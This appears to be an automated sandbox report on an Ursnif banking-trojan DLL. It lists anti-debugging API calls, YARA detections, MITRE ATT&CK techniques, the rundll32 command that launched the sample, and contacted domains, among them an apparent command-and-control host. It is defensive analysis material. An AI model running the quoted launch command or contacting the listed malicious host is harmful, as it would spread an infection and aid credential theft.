                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E281F00 push dword ptr fs:[00000030h]3_2_6E281F00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2822F9 mov eax, dword ptr fs:[00000030h]3_2_6E2822F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E24C28B mov eax, dword ptr fs:[00000030h]5_2_6E24C28B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E250947 mov eax, dword ptr fs:[00000030h]5_2_6E250947
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E2823C3 mov eax, dword ptr fs:[00000030h]5_2_6E2823C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E281F00 push dword ptr fs:[00000030h]5_2_6E281F00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E2822F9 mov eax, dword ptr fs:[00000030h]5_2_6E2822F9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E24A5EE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E247869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E247869
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2479EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E2479EB
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E24A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E24A5EE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E247869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E247869
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2479EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6E2479EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E24A5EE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E247869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E247869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2479EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E2479EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E24A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6E24A5EE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E247869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6E247869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E2479EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6E2479EB
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.469909377.0000000000DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.470880514.00000000036F0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.470577350.0000000003450000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.473665031.0000000003370000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.469909377.0000000000DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.470880514.00000000036F0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.470577350.0000000003450000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.473665031.0000000003370000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.469909377.0000000000DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.470880514.00000000036F0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.470577350.0000000003450000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.473665031.0000000003370000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.469909377.0000000000DB0000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.470880514.00000000036F0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.470577350.0000000003450000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.473665031.0000000003370000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E247689 cpuid 0_2_6E247689
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E201566
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,2_2_6E201566
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2017A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E2017A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E20146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E20146C
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.473399116.0000000005658000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3864, type: MEMORY
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.414055560.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.421428339.0000000003120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.424668518.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.3.rundll32.exe.3128d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.regsvr32.exe.30b8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e200000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.5e8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e200000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2d78d03.0.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.473399116.0000000005658000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3864, type: MEMORY
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.414055560.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.421428339.0000000003120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.424668518.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.3.rundll32.exe.3128d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.regsvr32.exe.30b8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e200000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.5e8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e200000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2d78d03.0.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSystem Information Discovery34VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 429224 Sample: racial.drc Startdate: 03/06/2021 Architecture: WINDOWS Score: 84 35 Multi AV Scanner detection for domain / URL 2->35 37 Found malware configuration 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 2 other signatures 2->41 7 loaddll32.exe 1 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        11 iexplore.exe 2 88 7->11         started        13 regsvr32.exe 7->13         started        15 rundll32.exe 7->15         started        process5 17 rundll32.exe 9->17         started        20 iexplore.exe 5 153 11->20         started        23 iexplore.exe 24 11->23         started        dnsIp6 33 Writes registry values via WMI 17->33 25 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49714, 49715 FASTLYUS United States 20->25 27 geolocation.onetrust.com 104.20.184.68, 443, 49702, 49703 CLOUDFLARENETUS United States 20->27 31 8 other IPs or domains 20->31 29 authd.feronok.com 35.199.86.111, 80 GOOGLEUS United States 23->29 signatures7

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      racial.dll23%VirustotalBrowse
                      racial.dll32%ReversingLabsWin32.Trojan.Zusy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.2db0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.6b0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      authd.feronok.com10%VirustotalBrowse
                      tls13.taboola.map.fastly.net0%VirustotalBrowse
                      img.img-taboola.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                      https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                      https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                      https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                      https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                      https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
                      https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                      https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                      https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                      https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                      https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                      https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                      https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                      https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                      https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                      http://www.wikipedia.com/0%URL Reputationsafe
                      http://www.wikipedia.com/0%URL Reputationsafe
                      http://www.wikipedia.com/0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      contextual.media.net
                      23.57.80.37
                      truefalse
                        high
                        authd.feronok.com
                        35.199.86.111
                        truefalseunknown
                        tls13.taboola.map.fastly.net
                        151.101.1.44
                        truefalseunknown
                        hblg.media.net
                        23.57.80.37
                        truefalse
                          high
                          lg3.media.net
                          23.57.80.37
                          truefalse
                            high
                            geolocation.onetrust.com
                            104.20.184.68
                            truefalse
                              high
                              web.vortex.data.msn.com
                              unknown
                              unknownfalse
                                high
                                www.msn.com
                                unknown
                                unknownfalse
                                  high
                                  srtb.msn.com
                                  unknown
                                  unknownfalse
                                    high
                                    img.img-taboola.com
                                    unknown
                                    unknownfalseunknown
                                    cvision.media.net
                                    unknown
                                    unknownfalse
                                      high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://searchads.msn.net/.cfm?&&kp=1&~DF1C59239F0C65121E.TMP.4.drfalse
                                        high
                                        https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.6.drfalse
                                          high
                                          https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.6.drfalse
                                            high
                                            https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_nade-ch[1].htm.6.drfalse
                                              high
                                              https://onedrive.live.com;Fotos52-478955-68ddb2ab[1].js.6.drfalse
                                              • Avira URL Cloud: safe
                                              low
                                              https://www.msn.com/de-ch/sport?ocid=StripeOCIDde-ch[1].htm.6.drfalse
                                                high
                                                https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorplade-ch[1].htm.6.drfalse
                                                  high
                                                  https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.6.drfalse
                                                    high
                                                    https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel52-478955-68ddb2ab[1].js.6.drfalse
                                                      high
                                                      http://ogp.me/ns/fb#de-ch[1].htm.6.drfalse
                                                        high
                                                        https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=httde-ch[1].htm.6.drfalse
                                                          high
                                                          https://outlook.live.com/mail/deeplink/compose;Kalender52-478955-68ddb2ab[1].js.6.drfalse
                                                            high
                                                            https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg~DF1C59239F0C65121E.TMP.4.drfalse
                                                              high
                                                              https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.6.drfalse
                                                                high
                                                                https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn52-478955-68ddb2ab[1].js.6.drfalse
                                                                  high
                                                                  https://www.msn.com/de-ch/sport/nachrichten/schweiz-unterliegt-deutschland-im-penaltyschiessen/ar-AAde-ch[1].htm.6.drfalse
                                                                    high
                                                                    https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mehr-sicherheit-und-weniger-versp%c3%a4tungen-im-fde-ch[1].htm.6.drfalse
                                                                      high
                                                                      http://www.reddit.com/msapplication.xml4.4.drfalse
                                                                        high
                                                                        https://www.skype.com/de-ch[1].htm.6.drfalse
                                                                          high
                                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%auction[1].htm.6.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.6.drfalse
                                                                            high
                                                                            https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.6.drfalse
                                                                              high
                                                                              https://onedrive.live.com/?qt=allmyphotos;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                high
                                                                                https://amzn.to/2TTxhNgde-ch[1].htm.6.drfalse
                                                                                  high
                                                                                  https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                    high
                                                                                    https://client-s.gateway.messenger.live.com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                      high
                                                                                      https://www.msn.com/de-ch/de-ch[1].htm.6.drfalse
                                                                                        high
                                                                                        https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAKde-ch[1].htm.6.drfalse
                                                                                          high
                                                                                          https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site52-478955-68ddb2ab[1].js.6.drfalse
                                                                                            high
                                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1~DF1C59239F0C65121E.TMP.4.drfalse
                                                                                              high
                                                                                              https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.6.drfalse
                                                                                                high
                                                                                                https://www.msn.com/de-chde-ch[1].htm.6.drfalse
                                                                                                  high
                                                                                                  https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.6.drfalse
                                                                                                    high
                                                                                                    https://twitter.com/i/notifications;Ich52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                      high
                                                                                                      https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.6.drfalse
                                                                                                        high
                                                                                                        https://www.msn.com/de-ch/news/other/walt-disney-sprach-ihn-an-und-pl%c3%b6tzlich-stand-sein-leben-kde-ch[1].htm.6.drfalse
                                                                                                          high
                                                                                                          https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.6.drfalse
                                                                                                            high
                                                                                                            https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                              high
                                                                                                              https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.6.drfalse
                                                                                                                high
                                                                                                                http://www.youtube.com/msapplication.xml7.4.drfalse
                                                                                                                  high
                                                                                                                  http://ogp.me/ns#de-ch[1].htm.6.drfalse
                                                                                                                    high
                                                                                                                    https://onedrive.live.com/?qt=mru;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                      high
                                                                                                                      https://www.skype.com/de52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verkde-ch[1].htm.6.drfalse
                                                                                                                          high
                                                                                                                          https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverbde-ch[1].htm.6.drfalse
                                                                                                                            high
                                                                                                                            https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.6.drfalse
                                                                                                                              high
                                                                                                                              https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;de-ch[1].htm.6.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://www.skype.com/de/download-skype52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                high
                                                                                                                                https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.6.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.hotmail.msn.com/pii/ReadOutlookEmail/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                    high
                                                                                                                                    https://onedrive.live.com;OneDrive-App52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    low
                                                                                                                                    https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.6.drfalse
                                                                                                                                      high
                                                                                                                                      https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692de-ch[1].htm.6.drfalse
                                                                                                                                        high
                                                                                                                                        https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                          high
                                                                                                                                          http://www.amazon.com/msapplication.xml.4.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%de-ch[1].htm.6.drfalse
                                                                                                                                              high
                                                                                                                                              https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=152-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                high
                                                                                                                                                http://www.twitter.com/msapplication.xml5.4.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://outlook.com/de-ch[1].htm.6.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2~DF1C59239F0C65121E.TMP.4.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.6.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.msn.com/de-ch/?ocid=iehp~DF1C59239F0C65121E.TMP.4.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.6.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.nytimes.com/msapplication.xml3.4.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.6.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.htmliab2Data[1].json.6.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://www.bidstack.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
